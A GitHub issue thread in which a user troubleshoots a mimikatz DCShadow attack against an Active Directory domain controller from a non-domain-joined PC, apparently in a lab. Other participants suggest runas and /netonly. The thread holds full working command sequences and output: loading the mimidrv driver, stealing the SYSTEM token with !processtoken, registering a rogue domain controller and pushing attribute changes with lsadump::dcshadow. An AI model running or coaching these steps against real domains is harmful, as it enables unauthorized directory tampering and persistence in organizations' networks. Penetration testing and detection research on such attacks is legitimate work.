Can't find way to run Mimikatz in context of a domain administrator on non-domain-joined PC for DC Shadow attack

[rick-engle]

I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context:
mimikatz # token::whoami

• Process Token : {0;000003e7} 2 D 1443633 TARGETDOMAIN\ADMINUSER S-xxxxx (04g,30p) Primary
• Thread Token : no token

The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context.
Is there a way to do this?

Thanks.

[picheljitsu]

Uhh you try runas already?

…

On Thu, Mar 16, 2023 at 15:06 rick-engle ***@***.***> wrote: I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context: mimikatz # token::whoami - Process Token : {0;000003e7} 2 D 1443633 TARGETDOMAIN\ADMINUSER S-1-5-18 (04g,30p) Primary - Thread Token : no token The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context. Is there a way to do this? Thanks. — Reply to this email directly, view it on GitHub <#423>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AEOE6BTG7DH4SP7ZHHWSL2TW4NXGHANCNFSM6AAAAAAV5VXKAU> . You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

[rick-engle]

I did try that but unfortunately I get this error:
C:\temp>runas /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"
Enter the password for mydomain.com\badadmin:
Attempting to start C:\Attackfolder\x64\mimikatz.exe as user "mydomain.com\badadmin" ...
RUNAS ERROR: Unable to run - C:\Attackfolder\x64\mimikatz.exe
1787: The security database on the server does not have a computer account for this workstation trust relationship.

[gentilkiwi]

/netonly

[rick-engle]

Hi @gentilkiwi , That command works but doesn't seem to change the user context. If I use this it launches mimikatz OK, but the whoami still shows me in the context of the local admin account I signed into the Windows PC with:
runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"
mimikatz # token::whoami

• Process Token : {0;0057a282} 2 L 5743378 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
• Thread Token : no token

[gentilkiwi]

The netonly, is ... network only.
If all is ok, you'll see correct user in a network cap. by eg.

[rick-engle]

Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller:

Mimikatz session #1

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )

\ / ## > https://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started

mimikatz # !processtoken
Token from process 0 to process 0

• from 0 will take SYSTEM token
• to 0 will take all 'cmd' and 'mimikatz' process
  Token from 4/System
• to 4976/cmd.exe
• to 5704/mimikatz.exe
• to 2844/mimikatz.exe

mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com /attribute:Description /value="My new cool description is swell!"
** Domain Info **

Domain: DC=mydomain,DC=com
Configuration: CN=Configuration,DC=mydomain,DC=com
Schema: CN=Schema,CN=Configuration,DC=mydomain,DC=com
dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635132

** Server Info **

Server: DC1.mydomain.com
InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c}
InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com

** Attributes checking **

#0: Description

** Objects **

#0: jeffl
DN:CN=JeffL,CN=Users,DC=mydomain,DC=com
Description (2.5.4.13-d rev 1):
My new cool description is swell!
(4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000)

** Starting server **

BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196]
RPC bind registered
RPC Server is waiting!
== Press Control+C to stop ==

Mimikatz session #2
Launch with:
runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"

mimikatz # token::whoami

• Process Token : {0;00630804} 2 L 6490326 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
• Thread Token : no token

mimikatz # lsadump::dcshadow /push
ERROR kull_m_net_getDC ; DsGetDcName: 1355

mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com
** Domain Info **

Domain: DC=mydomain,DC=com
Configuration: CN=Configuration,DC=mydomain,DC=com
Schema: CN=Schema,CN=Configuration,DC=mydomain,DC=com
dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635133

** Server Info **

Server: DC1.mydomain.com
InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c}
InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com

** Performing Registration **

** Performing Push **

Syncing DC=mydomain,DC=com
Sync Done

** Performing Unregistration **

[picheljitsu]

Are you in a virtualized environment or attached to multiple networks? Also, have you dumped dns traffic to see what’s going on?

…

On Fri, Mar 17, 2023 at 09:47 rick-engle ***@***.***> wrote: Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 <#2> making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller: Mimikatz session #1 <#1> .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) / \ ## /*** Benjamin DELPY gentilkiwi ( ***@***.*** ) \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( ***@***.*** ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # !+ [+] 'mimidrv' service already registered [*] 'mimidrv' service already started mimikatz # !processtoken Token from process 0 to process 0 - from 0 will take SYSTEM token - to 0 will take all 'cmd' and 'mimikatz' process Token from 4/System - to 4976/cmd.exe - to 5704/mimikatz.exe - to 2844/mimikatz.exe mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com /attribute:Description /value="My new cool description is swell!" ** Domain Info ** Domain: DC=toondom,DC=com Configuration: CN=Configuration,DC=toondom,DC=com Schema: CN=Schema,CN=Configuration,DC=toondom,DC=com dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=toondom,DC=com domainControllerFunctionality: 6 ( WIN2012R2 ) highestCommittedUSN: 635132 ** Server Info ** Server: DC1.mydomain.com InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c} InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a} Fake Server (not already registered): ATTACKER-EXT.mydomain.com ** Attributes checking ** #0: Description ** Objects ** #0: jeffl DN:CN=JeffL,CN=Users,DC=toondom,DC=com Description (2.5.4.13-d rev 1): My new cool description is swell! (4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000) ** Starting server ** BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196] RPC bind registered RPC Server is waiting! == Press Control+C to stop == Mimikatz session #2 <#2> Launch with: runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe" mimikatz # token::whoami - Process Token : {0;00630804} 2 L 6490326 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary - Thread Token : no token mimikatz # lsadump::dcshadow /push ERROR kull_m_net_getDC ; DsGetDcName: 1355 mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com ** Domain Info ** Domain: DC=toondom,DC=com Configuration: CN=Configuration,DC=toondom,DC=com Schema: CN=Schema,CN=Configuration,DC=toondom,DC=com dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=toondom,DC=com domainControllerFunctionality: 6 ( WIN2012R2 ) highestCommittedUSN: 635133 ** Server Info ** Server: DC1.mydomain.com InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c} InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a} Fake Server (not already registered): ATTACKER-EXT.mydomain.com ** Performing Registration ** ** Performing Push ** Syncing DC=toondom,DC=com Sync Done ** Performing Unregistration ** — Reply to this email directly, view it on GitHub <#423 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AEOE6BSZ6YYDSEXMKQTUVU3W4R2OPANCNFSM6AAAAAAV5VXKAU> . You are receiving this because you commented.Message ID: ***@***.***>

[bbhorrigan]

This seems like you are having network issues reading thru this, because I can't imagine this not being related to some type of network issue.